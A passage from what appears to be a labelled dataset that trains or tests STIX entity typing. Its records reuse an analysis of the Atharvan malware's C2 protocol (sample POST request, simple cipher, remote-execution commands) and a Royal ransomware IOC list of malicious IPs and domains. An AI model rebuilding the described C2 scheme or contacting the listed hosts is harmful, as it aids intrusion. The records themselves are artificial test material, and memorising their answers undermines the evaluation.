\"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nAWS\n\n---\n\n### Text Passage:\nAtharvan\nAtharvan is so-named because when the malware is run, it creates a mutex named: \"SAPTARISHI-ATHARVAN-101\" to ensure that only one copy is running.\nIt will then contact a hardcoded C&C server. The hardcoded C&C addresses seen in one of the samples analyzed to date was for Amazon AWS South Korea (Seoul) region, which is not a common location for C&C infrastructure.\nThe C&C communications are formatted as HTTP POST requests where the Host header is hardcoded as \"update.microsoft.com\", e.g.:\n_POST /update.php HTTP/1.1_\n_User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52_\n_Host: update.microsoft.com_\n_Content-type: application/x-www-form-urlencoded_\n_Content-length: 46_\n_id=Atharvan &code=101&cid=H[REDACTED]&time=5_\nThe request body includes the following parameters:\n* \"id\": hardcoded string \"Atharvan\"\n* \"code\": represents request purpose, which can be one of:\n* 101: fetches commands\n* 102: sends command outputs or error messages\n* 103: fetches file body to write when processing command 0x12\n* \"cid\": hardcoded string \"H\" followed by the network interface hardware address of the affected computer as 12 hexadecimal digits\n* \"time\": interval between communication attempts\n* \"msg\" (optional): depending on the request purpose as specified using \"code\" parameter:\n* when the \"code\" parameter is 102, it includes output of commands or error messages in encrypted form\n* when the \"code\" parameter is 103, it identifies the file to fetch in non-encrypted form\nWhen encrypting the \"msg\" value, the malware uses the following encryption algorithm:\ndef encrypt(plaintext):\n_return bytes([((2 - byte) & 0xff) for byte in plaintext])_\nThe malware uses its own simplistic HTTP parser to extract the body from the server response. The extracted body is decrypted using the following algorithm:\ndef decrypt(ciphertext):\n_return bytes([((2 - byte) & 0xff) for byte in ciphertext])_\nWhen fetching commands, the malware expects the decrypted body to contain a sequence of strings separated by the \"\\x1A\" character.\nThe first byte of each string specifies the command to execute and the remaining bytes are interpreted as command parameters.\nTable 1. Atharvan commandsCommand Description\n------\n0x11 Configures interval between communication attempts\n0x12 Downloads arbitrary file from specified control server\n0x15 Runs arbitrary executable and sends its output to the remote attacker\n0x16 Configures communication to use schedule type 0x16\n0x17 Configures communication to use schedule type 0x17\n0x18 Configures communication to use schedule type 0x18\nWhen configuring a communication schedule, the command parameters specify the times and days for the communication attempts. Several different times can be specified, with the hour and minute of the day encoded.\nThe days are interpreted as:\n* No restrictions (communication schedule type 0x16)\n* Bitmask specifying days of month (communication schedule type 0x17)\n* Bitmask specifying days of week (communication schedule type 0x18)\nThis scheduled communication configuration is another unusual feature of the malware and is not commonly seen in malware of this kind.\n",
"output": "INFRASTRUCTURE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nSouth Korea\n\n---\n\n### Text Passage:\nAtharvan\nAtharvan is so-named because when the malware is run, it creates a mutex named: \"SAPTARISHI-ATHARVAN-101\" to ensure that only one copy is running.\nIt will then contact a hardcoded C&C server. The hardcoded C&C addresses seen in one of the samples analyzed to date was for Amazon AWS South Korea (Seoul) region, which is not a common location for C&C infrastructure.\nThe C&C communications are formatted as HTTP POST requests where the Host header is hardcoded as \"update.microsoft.com\", e.g.:\n_POST /update.php HTTP/1.1_\n_User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52_\n_Host: update.microsoft.com_\n_Content-type: application/x-www-form-urlencoded_\n_Content-length: 46_\n_id=Atharvan &code=101&cid=H[REDACTED]&time=5_\nThe request body includes the following parameters:\n* \"id\": hardcoded string \"Atharvan\"\n* \"code\": represents request purpose, which can be one of:\n* 101: fetches commands\n* 102: sends command outputs or error messages\n* 103: fetches file body to write when processing command 0x12\n* \"cid\": hardcoded string \"H\" followed by the network interface hardware address of the affected computer as 12 hexadecimal digits\n* \"time\": interval between communication attempts\n* \"msg\" (optional): depending on the request purpose as specified using \"code\" parameter:\n* when the \"code\" parameter is 102, it includes output of commands or error messages in encrypted form\n* when the \"code\" parameter is 103, it identifies the file to fetch in non-encrypted form\nWhen encrypting the \"msg\" value, the malware uses the following encryption algorithm:\ndef encrypt(plaintext):\n_return bytes([((2 - byte) & 0xff) for byte in plaintext])_\nThe malware uses its own simplistic HTTP parser to extract the body from the server response. The extracted body is decrypted using the following algorithm:\ndef decrypt(ciphertext):\n_return bytes([((2 - byte) & 0xff) for byte in ciphertext])_\nWhen fetching commands, the malware expects the decrypted body to contain a sequence of strings separated by the \"\\x1A\" character.\nThe first byte of each string specifies the command to execute and the remaining bytes are interpreted as command parameters.\nTable 1. Atharvan commandsCommand Description\n------\n0x11 Configures interval between communication attempts\n0x12 Downloads arbitrary file from specified control server\n0x15 Runs arbitrary executable and sends its output to the remote attacker\n0x16 Configures communication to use schedule type 0x16\n0x17 Configures communication to use schedule type 0x17\n0x18 Configures communication to use schedule type 0x18\nWhen configuring a communication schedule, the command parameters specify the times and days for the communication attempts. Several different times can be specified, with the hour and minute of the day encoded.\nThe days are interpreted as:\n* No restrictions (communication schedule type 0x16)\n* Bitmask specifying days of month (communication schedule type 0x17)\n* Bitmask specifying days of week (communication schedule type 0x18)\nThis scheduled communication configuration is another unusual feature of the malware and is not commonly seen in malware of this kind.\n",
"output": "LOCATION"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nupdate.php\n\n---\n\n### Text Passage:\nAtharvan\nAtharvan is so-named because when the malware is run, it creates a mutex named: \"SAPTARISHI-ATHARVAN-101\" to ensure that only one copy is running.\nIt will then contact a hardcoded C&C server. The hardcoded C&C addresses seen in one of the samples analyzed to date was for Amazon AWS South Korea (Seoul) region, which is not a common location for C&C infrastructure.\nThe C&C communications are formatted as HTTP POST requests where the Host header is hardcoded as \"update.microsoft.com\", e.g.:\n_POST /update.php HTTP/1.1_\n_User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52_\n_Host: update.microsoft.com_\n_Content-type: application/x-www-form-urlencoded_\n_Content-length: 46_\n_id=Atharvan &code=101&cid=H[REDACTED]&time=5_\nThe request body includes the following parameters:\n* \"id\": hardcoded string \"Atharvan\"\n* \"code\": represents request purpose, which can be one of:\n* 101: fetches commands\n* 102: sends command outputs or error messages\n* 103: fetches file body to write when processing command 0x12\n* \"cid\": hardcoded string \"H\" followed by the network interface hardware address of the affected computer as 12 hexadecimal digits\n* \"time\": interval between communication attempts\n* \"msg\" (optional): depending on the request purpose as specified using \"code\" parameter:\n* when the \"code\" parameter is 102, it includes output of commands or error messages in encrypted form\n* when the \"code\" parameter is 103, it identifies the file to fetch in non-encrypted form\nWhen encrypting the \"msg\" value, the malware uses the following encryption algorithm:\ndef encrypt(plaintext):\n_return bytes([((2 - byte) & 0xff) for byte in plaintext])_\nThe malware uses its own simplistic HTTP parser to extract the body from the server response. The extracted body is decrypted using the following algorithm:\ndef decrypt(ciphertext):\n_return bytes([((2 - byte) & 0xff) for byte in ciphertext])_\nWhen fetching commands, the malware expects the decrypted body to contain a sequence of strings separated by the \"\\x1A\" character.\nThe first byte of each string specifies the command to execute and the remaining bytes are interpreted as command parameters.\nTable 1. Atharvan commandsCommand Description\n------\n0x11 Configures interval between communication attempts\n0x12 Downloads arbitrary file from specified control server\n0x15 Runs arbitrary executable and sends its output to the remote attacker\n0x16 Configures communication to use schedule type 0x16\n0x17 Configures communication to use schedule type 0x17\n0x18 Configures communication to use schedule type 0x18\nWhen configuring a communication schedule, the command parameters specify the times and days for the communication attempts. Several different times can be specified, with the hour and minute of the day encoded.\nThe days are interpreted as:\n* No restrictions (communication schedule type 0x16)\n* Bitmask specifying days of month (communication schedule type 0x17)\n* Bitmask specifying days of week (communication schedule type 0x18)\nThis scheduled communication configuration is another unusual feature of the malware and is not commonly seen in malware of this kind.\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nupdate.microsoft.com\n\n---\n\n### Text Passage:\nAtharvan\nAtharvan is so-named because when the malware is run, it creates a mutex named: \"SAPTARISHI-ATHARVAN-101\" to ensure that only one copy is running.\nIt will then contact a hardcoded C&C server. The hardcoded C&C addresses seen in one of the samples analyzed to date was for Amazon AWS South Korea (Seoul) region, which is not a common location for C&C infrastructure.\nThe C&C communications are formatted as HTTP POST requests where the Host header is hardcoded as \"update.microsoft.com\", e.g.:\n_POST /update.php HTTP/1.1_\n_User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52_\n_Host: update.microsoft.com_\n_Content-type: application/x-www-form-urlencoded_\n_Content-length: 46_\n_id=Atharvan &code=101&cid=H[REDACTED]&time=5_\nThe request body includes the following parameters:\n* \"id\": hardcoded string \"Atharvan\"\n* \"code\": represents request purpose, which can be one of:\n* 101: fetches commands\n* 102: sends command outputs or error messages\n* 103: fetches file body to write when processing command 0x12\n* \"cid\": hardcoded string \"H\" followed by the network interface hardware address of the affected computer as 12 hexadecimal digits\n* \"time\": interval between communication attempts\n* \"msg\" (optional): depending on the request purpose as specified using \"code\" parameter:\n* when the \"code\" parameter is 102, it includes output of commands or error messages in encrypted form\n* when the \"code\" parameter is 103, it identifies the file to fetch in non-encrypted form\nWhen encrypting the \"msg\" value, the malware uses the following encryption algorithm:\ndef encrypt(plaintext):\n_return bytes([((2 - byte) & 0xff) for byte in plaintext])_\nThe malware uses its own simplistic HTTP parser to extract the body from the server response. The extracted body is decrypted using the following algorithm:\ndef decrypt(ciphertext):\n_return bytes([((2 - byte) & 0xff) for byte in ciphertext])_\nWhen fetching commands, the malware expects the decrypted body to contain a sequence of strings separated by the \"\\x1A\" character.\nThe first byte of each string specifies the command to execute and the remaining bytes are interpreted as command parameters.\nTable 1. Atharvan commandsCommand Description\n------\n0x11 Configures interval between communication attempts\n0x12 Downloads arbitrary file from specified control server\n0x15 Runs arbitrary executable and sends its output to the remote attacker\n0x16 Configures communication to use schedule type 0x16\n0x17 Configures communication to use schedule type 0x17\n0x18 Configures communication to use schedule type 0x18\nWhen configuring a communication schedule, the command parameters specify the times and days for the communication attempts. Several different times can be specified, with the hour and minute of the day encoded.\nThe days are interpreted as:\n* No restrictions (communication schedule type 0x16)\n* Bitmask specifying days of month (communication schedule type 0x17)\n* Bitmask specifying days of week (communication schedule type 0x18)\nThis scheduled communication configuration is another unusual feature of the malware and is not commonly seen in malware of this kind.\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n77.73.133.84\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n45.61.136.47\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nRoyal\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "MALWARE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents 